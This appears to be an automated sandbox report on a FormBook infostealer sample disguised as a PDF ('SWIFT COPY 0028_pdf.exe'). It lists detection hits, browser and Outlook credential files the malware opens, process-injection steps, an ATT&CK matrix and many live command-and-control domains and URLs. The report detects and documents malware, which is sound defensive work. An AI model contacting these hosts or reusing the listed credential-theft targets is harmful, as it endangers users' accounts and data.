                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0093DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_81
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_XP
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_XPe
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_VISTA
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_7
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00978C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00978C4F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0097923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0097923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559148 Sample: SWIFT COPY 0028_pdf.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 28 www.optimismbank.xyz 2->28 30 www.aziziyeescortg.xyz 2->30 32 27 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 6 other signatures 2->50 10 SWIFT COPY 0028_pdf.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 nBMWUKLuWlMJko.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasautou.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 nBMWUKLuWlMJko.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.housew.website 203.161.46.205, 50018, 50019, 50020 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.madhf.tech 103.224.182.242, 50027, 50028, 50029 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SWIFT COPY 0028_pdf.exe39%ReversingLabsWin32.Trojan.AutoitInject
                SWIFT COPY 0028_pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://pepabo.com/0%Avira URL Cloudsafe
                http://www.aiactor.xyz/g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                http://www.optimismbank.xyz/lnyv/0%Avira URL Cloudsafe
                http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7P0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/0kli/0%Avira URL Cloudsafe
                http://www.sankan-fukushi.info/21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E=0%Avira URL Cloudsafe
                http://www.a1shop.shop/0krx/0%Avira URL Cloudsafe
                http://www.nonpressure.beauty100%Avira URL Cloudmalware
                http://www.sitioseguro.blog/arvb/0%Avira URL Cloudsafe
                http://www.questmatch.pro/ipd6/0%Avira URL Cloudsafe
                http://www.sankan-fukushi.info/21k5/0%Avira URL Cloudsafe
                http://www.housew.website/4pih/0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                http://www.callyur.shop/hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                http://www.housew.website/4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0=0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/5rfk/0%Avira URL Cloudsafe
                http://www.callyur.shop/hayl/0%Avira URL Cloudsafe
                http://www.nonpressure.beauty/ymqd/100%Avira URL Cloudmalware
                http://www.nuy25c9t.sbs/lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
                http://www.conansog.shop/m7wz/0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                http://www.questmatch.pro/ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo=0%Avira URL Cloudsafe
                http://www.aiactor.xyz/g2y0/0%Avira URL Cloudsafe
                http://www.a1shop.shop/0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                http://www.madhf.tech/vpqb/0%Avira URL Cloudsafe
                https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
                http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
                http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe
                https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW0%Avira URL Cloudsafe
                http://www.beythome.online/80gy/0%Avira URL Cloudsafe
                https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz/wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI=0%Avira URL Cloudsafe
                http://www.nuy25c9t.sbs/lmj1/0%Avira URL Cloudsafe
                http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax100%Avira URL Cloudmalware
                http://www.tempatmudisini06.click/0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aziziyeescortg.xyz
                		188.114.96.3
                		truetrue
                  		unknown
                  www.optimismbank.xyz
                  		13.248.169.48
                  		truetrue
                    		unknown
                    www.madhf.tech
                    		103.224.182.242
                    		truetrue
                      		unknown
                      tempatmudisini06.click
                      		103.21.221.4
                      		truetrue
                        		unknown
                        www.housew.website
                        		203.161.46.205
                        		truetrue
                          		unknown
                          b1-3-r111.kunlundns.top
                          		43.155.76.124
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truefalse
                              		high
                              www.a1shop.shop
                              		13.248.169.48
                              		truetrue
                                		unknown
                                callyur.shop
                                		66.29.137.10
                                		truetrue
                                  		unknown
                                  www.aiactor.xyz
                                  		13.248.169.48
                                  		truetrue
                                    		unknown
                                    ssl.goentri.com
                                    		76.223.74.74
                                    		truetrue
                                      		unknown
                                      www.questmatch.pro
                                      		188.114.96.3
                                      		truetrue
                                        		unknown
                                        www.conansog.shop
                                        		172.67.162.12
                                        		truetrue
                                          		unknown
                                          www.nonpressure.beauty
                                          		104.21.4.93
                                          		truetrue
                                            		unknown
                                            www.sitioseguro.blog
                                            		172.67.162.39
                                            		truetrue
                                              		unknown
                                              www.sankan-fukushi.info
                                              		163.44.185.183
                                              		truetrue
                                                		unknown
                                                www.grandesofertas.fun
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.callyur.shop
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.beythome.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.nuy25c9t.sbs
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.tempatmudisini06.click
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.tempatmudisini06.click/0kli/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.optimismbank.xyz/lnyv/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.questmatch.pro/ipd6/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sitioseguro.blog/arvb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sankan-fukushi.info/21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.a1shop.shop/0krx/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aiactor.xyz/g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nonpressure.beauty/ymqd/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.housew.website/4pih/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sankan-fukushi.info/21k5/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.grandesofertas.fun/5rfk/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.callyur.shop/hayl/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.callyur.shop/hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.housew.website/4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nuy25c9t.sbs/lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.conansog.shop/m7wz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sitioseguro.blog/arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aiactor.xyz/g2y0/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/vpqb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.a1shop.shop/0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.questmatch.pro/ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beythome.online/80gy/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aziziyeescortg.xyz/wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nuy25c9t.sbs/lmj1/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.tempatmudisini06.click/0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVaxtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabrasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.nonpressure.beautynBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lolipop.jp/rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://pepabo.com/rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referrasautou.exe, 00000004.00000002.4614264307.00000000062E2000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004102000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7PnBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.00000000045B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrasautou.exe, 00000004.00000002.4614264307.0000000006474000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004294000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.lolipop.jp/hc/ja/articles/360049132953rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://kb.fastpanel.direct/troubleshoot/rasautou.exe, 00000004.00000002.4614264307.0000000006C4E000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 00000004.00000002.4616494626.0000000007B20000.00000004.00000800.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004A6E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
